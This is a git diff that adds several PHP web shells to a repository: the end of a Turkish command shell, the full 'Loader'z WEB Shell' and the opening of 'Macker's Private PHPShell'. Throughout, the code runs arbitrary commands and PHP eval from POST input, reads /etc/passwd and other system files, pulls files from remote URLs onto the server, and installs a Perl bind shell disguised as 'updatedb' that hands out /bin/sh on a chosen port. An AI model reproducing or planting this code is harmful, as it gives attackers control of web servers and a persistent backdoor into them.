+<option value="cat /etc/passwd">/etc/passwd</option>
+<option value="netstat -an | grep -i listen">Tüm Açık Portaları Gör</option>
+<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
+<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
+<option value="cat /etc/hosts">/etc/hosts</option>
+<option value="cat /etc/named.conf">/etc/named.conf</option>
+<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
+</select> <input type="submit" value="Göster Bakim">
+</form>
+</pre>
+');
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+$liz0=shell_exec($_POST[baba]); 
+$liz0zim=shell_exec($_POST[liz0]); 
+$uid=shell_exec('id');
+$server=shell_exec('uname -a');
+echo "<pre><h4>";
+echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
+echo "<b><font color=red>Server</font></b>:$server<br>";
+echo "<b><font color=red>Komut Sonuçları:</font></b><br>"; 
+echo $liz0;
+echo $liz0zim;
+echo "</h4></pre>";
+?>
\ No newline at end of file
diff --git a/php/Loaderz WEB Shell.php b/php/Loaderz WEB Shell.php
new file mode 100644
index 0000000..25ceaf6
--- /dev/null
+++ b/php/Loaderz WEB Shell.php	
@@ -0,0 +1,513 @@
+<?
+error_reporting(0);
+/* Loader'z WEB Shell v 0.1.0.2 {15 àâãóñòà 2005}
+Âîò êàêèå îí ïîääåğæèâàåò ôóíêöèè.
+- Ğàáîòà ñ ôàéëîâîé ñèñòåìîé ñ ïîìîùüş PHP.  óäîáíîé òàáëèöå ïğåäñòàâëåíî ñîäåğæèìîå òåêóùåé ïàêè (äîáàâëåíèå â ıòîé âåğñèè, íîğìàëüíûé âèä ïğàâ, à íå ÷èñëî :)).
+- Âûïîëíåíèå êîäà, ïõï ğóëèò ;)
+- Ğàáîòàåò ïğè register_globals=off
+- Áîëåå ïğèÿòíàÿ ğàáîòà â ñåéô ìîäå
+- Ïğîñìîòğ è ğåäàêòèğîâàíèå ôàéëîâ.
+- Çàêà÷êà ôàéëîâ ñ äğóãîãî ñåğâåğà ñ ïîìîùüş ñğåäñòâ PHP.
+- Çàêà÷êà ôàéëîâ ñ âàøåãî æåñòêîãî äèñêà.
+- Âûïîëíåíèå ïğîèçâîëüíûõ êîìàíä íà ñåğâåğå.
+- Ñêğèïò âûäàåò çíà÷åíèå íåêîòîğûõ ïåğåìåííûõ. Íàïğèìåğ îí ñîîáùèò âêëş÷åí ëè ñåéô ìîä, åñëè äà, òî ñêğèïò âûâåäåò äèğåêòîğèş êîòîğàÿ,
+âàì äîñòóïíà, à òàê æå ïóòü, ãäå âû ìîæåòå âûïîëíÿòü êîìàíäû.
+- Ğàáîòà ñêğèïòà îñíîâàíà íà îïğåäåëåíèè òèïà ñåğâåğà.
+- Åñëè ñêğèïò ğàáîòàåò ïîä óïğàâëåíèåì ÎÑ Windows, äàííûå ïîëó÷àåìûå ïğè âûïîëíåíèè êîìàíä ïåğåêîäèğóşòñÿ â win-1251.
+- Ïğèñóòñòâóåò ïğîñòåíüêèé ñêğèïò ïåğë-áèíä. Âû ìîæåòå óêàçàòü äîìàøíşş äèğåêòğèş è ïîğò íà êîòîğîì ïîâåñèòñÿ áåêäîğ.
+Loader Pro-Hack.ru
+*/
+?>
+
+<style type='text/css'>
+html { overflow-x: auto }
+BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; margin: 0px; padding: 0px; text-align: center; color: #c0c0c0; background-color: #000000 }
+TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #c0c0c0; background-color: #0000000 }
+BODY,TD {FONT-SIZE: 13px; FONT-FAMILY: verdana, arial, helvetica;}
+A:link {COLOR: #666666; TEXT-DECORATION: none}
+A:active {	COLOR: #666666; TEXT-DECORATION: none;}
+A:visited {COLOR: #666666; TEXT-DECORATION: none;}
+A:hover {COLOR: #999999; TEXT-DECORATION: none;}
+BODY {
+	SCROLLBAR-FACE-COLOR: #cccccc;
+	SCROLLBAR-HIGHLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-SHADOW-COLOR: #CBAB78;
+	SCROLLBAR-3DLIGHT-COLOR: #CBAB78;
+	SCROLLBAR-ARROW-COLOR: #000000;
+	SCROLLBAR-TRACK-COLOR: #000000;
+	SCROLLBAR-DARKSHADOW-COLOR: #CBAB78}
+
+
+
+
+fieldset.search { padding: 6px; line-height: 150% }
+
+label { cursor: pointer }
+
+form { display: inline }
+
+img { vertical-align: middle; border: 0px }
+
+img.attach { padding: 2px; border: 2px outset #000033 }
+
+#tb { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#logostrip { padding: 0px; margin: 0px; background-color: #000000; border: 1px solid #CBAB78; }
+#content { padding: 10px; margin: 10px; background-color: #000000; border: 1px solid #CBAB78; }
+#logo { FONT-SIZE: 50px; }
+input { width: 80; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+#input2 { width: 150; height : 17; background-color : #cccccc;
+ 	border-style: solid;border-width: 1; border-color: #CBAB78; font-size: xx-small; cursor: pointer; }
+
+
+</style>
+
+<script>
+function tag(thetag) {document.fe.editfile.value=thetag;}
+</script>
+
+
+<title>Loader'z WEB shell</title>
+
+<table height=100% "width="100%">
+<tr><td align="center" valign="top">
+
+
+<table><tr><td>
+<?php
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+    
+    
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+/*Íà÷èíàåòñÿ*/
+
+/*Îïğåäåëÿåì òèï ñèñòåìû*/
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+
+if (ereg("Win32", $servsoft, $reg)){
+$sertype = "winda";
+}
+else
+{
+$sertype = "other";}
+
+
+
+echo $servsoft . "<br>";
+chdir($dir);
+echo "Total space " . (int)(disk_total_space(getcwd())/(1024*1024)) . "Mb " . "Free space " . (int)(disk_free_space(getcwd())/(1024*1024)) . "Mb <br>";
+
+
+
+
+
+if (ini_get('safe_mode') <> 1){
+if ($sertype == "winda"){
+
+ob_start('decode');
+echo "OS: ";
+echo execute("ver") . "<br>";
+ob_end_flush();
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "uname:" . execute('uname -a') . "<br>";
+}}
+else{
+if ($sertype == "winda"){
+
+echo "OS: " . php_uname() . "<br>";
+
+}
+
+if ($sertype == "other"){
+echo "id:";
+
+echo execute("id") . "<br>";
+echo "OS:" . php_uname() . "<br>";
+}
+}
+
+echo 'User: ' .get_current_user() . '<br>';
+
+
+
+if (ini_get("open_basedir")){
+echo "open_basedir: " . ini_get("open_basedir");}
+
+
+if (ini_get('safe_mode') == 1){
+echo "<font size=\"3\"color=\"#cc0000\">Safe mode :(";
+
+if (ini_get('safe_mode_include_dir')){
+echo "Including from here: " . ini_get('safe_mode_include_dir'); }
+if (ini_get('safe_mode_exec_dir')){
+echo " Exec here: " . ini_get('safe_mode_exec_dir');
+}
+echo "</font>";}
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."êÁ)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>Successfully saved!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>PHP code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+
+
+<table id=tb><tr><td>Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"Do it\" id=input></td></tr></table></form>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>into:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+
+<table id=tb><tr><td>
+Download from Hard:<INPUT type=\"file\" name=\"userfile\" id=input2>
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+</td><td><INPUT type=\"submit\" value=\"Download\" id=input></form></div></td></tr></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>Install bind
+<b>Temp path</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\"></td><td>
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\" maxlength=5 size=4></td><td>
+
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Install\" id=input></form></div></td></table>";
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" name=fe>
+<table id=tb><tr><td>File to edit:
+<input type=\"text\" name=\"editfile\" ></td><td>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\" id=input></form></div></td></table>";
+
+
+
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"PHP code\" id=input></form></div></td></table>";
+?>
+</td></tr></table>
+
+
+</td></tr>
+<tr valign="BOTTOM">
+<td valign=bottom>
+
+
+<center>Coded by Loader <a href="http://pro-hack.ru">Pro-Hack.RU</a></center>
+
+
+</td>
+</tr>
+</table>
+
diff --git a/php/Macker's Private PHPShell.php b/php/Macker's Private PHPShell.php
new file mode 100644
index 0000000..9979c1e
--- /dev/null
+++ b/php/Macker's Private PHPShell.php	
@@ -0,0 +1,2026 @@
+<?php 
+
+
+
+/*
+
+*****************************************************************************************
+
+*                           PHPSHELL.PHP             *
+
+***************************************************************************************** 
+
+*                                                                                       *  
+
+*   Welcome to Macker's Private PHPShell script...                                              * 
+
+*   This script will allow you to browse webservers etc...                              * 
+
+*   Just copy the file to your directory and open it in your Internet Browser.          * 
+
+*                                                                                       * 
+
+*   The webserver should support PHP...                                                 * 
+
+*                                                                                       * 
+
+*   You can modify the script if you want, but please send me a copy to:                *  
+
+*                               MAX666@iranstars.com                                     * 
+
+***************************************************************************************** 
+
+
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+
+!!   PLEASE NOTE: You should use this script at own risk, it should do damage to the   !! 
+
+!!                Sites or even the server... You are responsible for your own deeds.  !! 
+
+!!                The admin of your webserver should always know you are using this    !!
+
+!!                script.                                                              !! 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+
+*/ 
+
+
+
+
+
+/*Setting some envirionment variables...*/ 
+
+
+
+/* I added this to ensure the script will run correctly...
+
+   Please enter the Script's filename in this variable. */   
+
+$SFileName=$PHP_SELF;
+
+
+
+/* uncomment the two following variables if you want to use http
+
+   authentication. This will password protect your PHPShell */
+
+//$http_auth_user = "phpshell";	/* HTTP Authorisation username, uncomment if you want to use this */
+
+//$http_auth_pass = "phpshell";	/* HTTP Authorisation password, uncomment if you want to use this */	    
+
+
+
+error_reporting(0);
+
+$PHPVer=phpversion();
+
+$isGoodver=(intval($PHPVer[0])>=4);
+
+$scriptTitle = "PHPShell";
+
+$scriptident = "$scriptTitle by MAX666";
+
+
+
+$urlAdd = "";
+
+$formAdd = "";
+
+
+
+function walkArray($array){
+
+  while (list($key, $data) = each($array))
+
+    if (is_array($data)) { walkArray($data); }
+
+    else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
+
+}
+
+
+
+if (isset($_PUT)) walkArray($_PUT);
+
+if (isset($_GET)) walkArray($_GET);
+
+if (isset($_POST)) walkArray($_POST);
+
+
+
+
+
+$pos = strpos($urlAdd, "s=r");
+
+if (strval($pos) != "") {
+
+$urlAdd= substr($urlAdd, 0, $pos);
+
+}
+
+
+
+$urlAdd .= "&s=r&";
+
+
+
+if (empty($Pmax))
+
+	$Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
+
+if (empty($Pidx)) 
+
+	$Pidx = 0;
+
+
+
+$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
+
+$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+
+
+$scriptdate = "For Server Hacking";
+
+$scriptver = "Private Exploit";
+
+$LOCAL_IMAGE_DIR = "img";
+
+$REMOTE_IMAGE_URL = "img";
+
+$img = array(
+
+				"Edit" 		=> "edit.gif",
+
+				"Download" 	=> "download.gif",
+
+				"Upload" 	=> "upload.gif",
+
+				"Delete" 	=> "delete.gif",
+
+				"View" 		=> "view.gif",
+
+				"Rename" 	=> "rename.gif",
+
+				"Move" 		=> "move.gif",
+
+				"Copy" 		=> "copy.gif",
+
+				"Execute" 	=> "exec.gif"
+
+            );
+
+
+
+while (list($id, $im)=each($img))
+
+	if (file_exists("$LOCAL_IMAGE_DIR/$im"))
+
+		$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
+
+	else
+
+ 		$img[$id] = "[$id]";
+
+
+
+
+
+
+
+
+
+/* HTTP AUTHENTICATION */
+
+
+
+    if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes")  )   { 
+
+	    setcookie("noauth","");
+
+	    Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"");
+
+	    Header( "HTTP/1.0  401  Unauthorized");
+
+	    echo "Your username or password is incorrect";
+
+	    exit ;
+
+			     
+
+    } 
+
+
+
+function buildUrl($display, $url) {
+
+        global $urlAdd;
+
+        $url = $SFileName . "?$urlAdd$url";
+
+	return "<a href=\"$url\">$display</a>";
+
+}
+
+
+
+function sp($mp) {
+
+	for ( $i = 0; $i < $mp; $i++ )
+
+		$ret .= "&nbsp;";
+
+	return $ret;
+
+}
+
+
+
+function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  } 
+
+
+
+function Mydeldir($Fdir) {
+
+	if (is_dir($Fdir)) {
+
+		$Fh=@opendir($Fdir);
+
+ 		while ($Fbuf = readdir($Fh))
+
+ 			if (($Fbuf != ".") && ($Fbuf != ".."))
+
+				Mydeldir("$Fdir/$Fbuf");
+
+		@closedir($Fh);
+
+				return rmdir($Fdir);
+
+	}	else {
+
+		return unlink($Fdir);
+
+	}
+
+}
+
+
+
+
+
+function arrval ($array) {
+
+list($key, $data) = $array;
+
+return $data;
+
+}
+
+
+
+function formatsize($insize) {  
+
+	$size = $insize;
+
+	$add = "B";
+
+	if ($size > 1024) {
+
+ 		$size = intval(intval($size) / 1.024)/1000;
+
+ 		$add = "KB";
+
+ 	}
+
+ 	if ($size > 1024) {
+
+ 		$size = intval(intval($size) / 1.024)/1000;
+
+ 		$add = "MB";
+
+ 	}
+
+ 	if ($size > 1024) {
+
+ 		$size = intval(intval($size) / 1.024)/1000;
+
+ 		$add = "GB";
+
+ 	}
+
+ 	if ($size > 1024) {
+
+ 		$size = intval(intval($size) / 1.024)/1000;
+
+ 		$add = "TB";
+
+ 	}
+
+ 	return "$size $add";
+
+}
+
+
+
+if ($cmd != "downl") {
+
+	?>
+
+
+
+<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
+
+<HTML>
+
+ <HEAD>
+
+  <STYLE>
+
+  <!--
+
+    A{ text-decoration:none; color:navy; font-size: 12px }
+
+    body { font-size: 12px; 
+
+           font-family: arial, helvetica;
+
+            scrollbar-width: 5;
+
+            scrollbar-height: 5;
+
+            scrollbar-face-color: white;
+
+            scrollbar-shadow-color: silver;
+
+            scrollbar-highlight-color: white;
+
+            scrollbar-3dlight-color:silver;
+
+            scrollbar-darkshadow-color: silver;
+
+            scrollbar-track-color: white;
+
+            scrollbar-arrow-color: black;
+
+    }
+
+    Table { font-size: 12px; }
+
+    TR{ font-size: 12px; }
+
+    TD{ font-size: 12px; 
+
+        font-family: arial, helvetical;
+
+        BORDER-LEFT: black 0px solid; 
+
+	BORDER-RIGHT: black 0px solid; 
+
+	BORDER-TOP: black 0px solid; 
+
+	BORDER-BOTTOM: black 0px solid; 
+
+	COLOR: black; 
+
+    }
+
+    .border{       BORDER-LEFT: black 1px solid;
+
+ 		   BORDER-RIGHT: black 1px solid;
+
+ 		   BORDER-TOP: black 1px solid;
+
+ 		   BORDER-BOTTOM: black 1px solid;
+
+ 		 }
+
+    .none  {       BORDER-LEFT: black 0px solid;
+
+ 		   BORDER-RIGHT: black 0px solid;
+
+ 		   BORDER-TOP: black 0px solid;
+
+ 		   BORDER-BOTTOM: black 0px solid;
+
+ 		 }
+
+    .inputtext {
+
+		    background-color: #EFEFEF;
+
+		    font-family: arial, helvetica;
+
+		    border: 1px solid #000000;
+
+		    height: 20;
+
+    }
+
+    .lighttd {       background: #F8F8F8;
+
+    }
+
+    .darktd {        background: #E8E8E8;
+
+    }
+
+    input { font-family: arial, helvetica;
+
+    }
+
+    .inputbutton {
+
+                        background-color: silver;
+
+			border: 1px solid #000000;
+
+			border-width: 1px;
+
+			height: 20;
+
+    }
+
+    .inputtextarea {
+
+		    background-color: #EFEFEF;
+
+		    border: 1px solid #000000;
+
+		    scrollbar-width: 5;
+
+		    scrollbar-height: 5;
+
+		    scrollbar-face-color: #EFEFEF;
+
+		    scrollbar-shadow-color: silver;
+
+		    scrollbar-highlight-color: #EFEFEF;
+
+		    scrollbar-3dlight-color:silver;
+
+		    scrollbar-darkshadow-color: silver;
+
+		    scrollbar-track-color: #EFEFEF;
+
+		    scrollbar-arrow-color: black;
+
+    }
+
+    .top { BORDER-TOP: black 1px solid; }
+
+    .textin { BORDER-LEFT: silver 1px solid;
+
+              BORDER-RIGHT: silver 1px solid;
+
+ 	      BORDER-TOP: silver 1px solid;
+
+              BORDER-BOTTOM: silver 1px solid;
+
+              width: 99%; font-size: 12px; font-weight: bold; color: navy;
+
+            }
+
+    .notop { BORDER-TOP: black 0px solid; }
+
+    .bottom { BORDER-BOTTOM: black 1px solid; }
+
+    .nobottom { BORDER-BOTTOM: black 0px solid; }
+
+    .left { BORDER-LEFT: black 1px solid; }
+
+    .noleft { BORDER-LEFT: black 0px solid; }
+
+    .right { BORDER-RIGHT: black 1px solid; }
+
+    .noright { BORDER-RIGHT: black 0px solid; }
+
+    .silver{ BACKGROUND: silver; }
+
+  -->
+
+  </STYLE>
+
+  <TITLE><?php echo $SFileName ?></TITLE>
+
+ </HEAD>
+
+ <body topmargin="0" leftmargin="0">
+
+ <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
+
+ <table width=100% height="100%" NOWRAP border="0">
+
+  <tr NOWRAP>
+
+   <td width="100%" NOWRAP>
+
+    <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0">
+
+     <tr>
+
+      <td width="100%" class="silver border">
+
+       <center>
+
+	    <strong>
+
+		 <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
+
+            </strong>
+
+       </center>
+
+      </td>
+
+     </tr>
+
+    </table><br>
+
+
+
+	<?php
+
+}
+
+
+
+if ( $cmd=="dir" ) {
+
+  	$h=@opendir($dir);
+
+ 	if ($h == false) {
+
+  		echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
+
+                COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n
+
+                THE SCRIPT WILL RESULT IN AN ERROR!!!
+
+                <br><br>".sp(3)."\n
+
+                PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
+
+                <br><br></font>\n\n\n\n";
+
+ 	}
+
+        if (function_exists('realpath')) {
+
+		$partdir = realpath($dir);
+
+	}
+
+        else {
+
+		$partdir = $dir;
+
+	}
+
+ 	if (strlen($partdir) >= 100) {
+
+ 		$partdir = substr($partdir, -100);
+
+ 		$pos = strpos($partdir, "/");
+
+ 		if (strval($pos) != "") {
+
+ 			$partdir = "<--   ...".substr($partdir, $pos);
+
+ 		}
+
+        $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
+
+        $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); 
+
+	$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
+
+ 	}
+
+    ?>
+
+      <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
+
+         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
+
+	  <tr>
+
+	   <td width="100%" class="silver border">
+
+	    <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center>
+
+	   </td>
+
+	  </tr>
+
+	 </table>
+
+       <br>
+
+	 <table width="100%" border="0" cellpadding="0" cellspacing="0">
+
+	  <tr>
+
+           <td class="border nobottom noright">
+
+            &nbsp;Browsing:&nbsp;
+
+	  </td>
+
+          <td width="100%" class="border nobottom noleft">
+
+   	    <table width="100%" border="0" cellpadding="1" cellspacing="0">
+
+             <tr>
+
+              <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
+
+              <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td>
+
+             </tr>
+
+            </table>
+
+            
+
+	  </td>
+
+	 </tr>
+
+	</table>
+
+  <!--    </form>   -->
+
+        <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
+
+         <tr>
+
+	  <td width="100%" NOWRAP class="silver border">
+
+	   &nbsp;Filename&nbsp;
+
+	  </td>
+
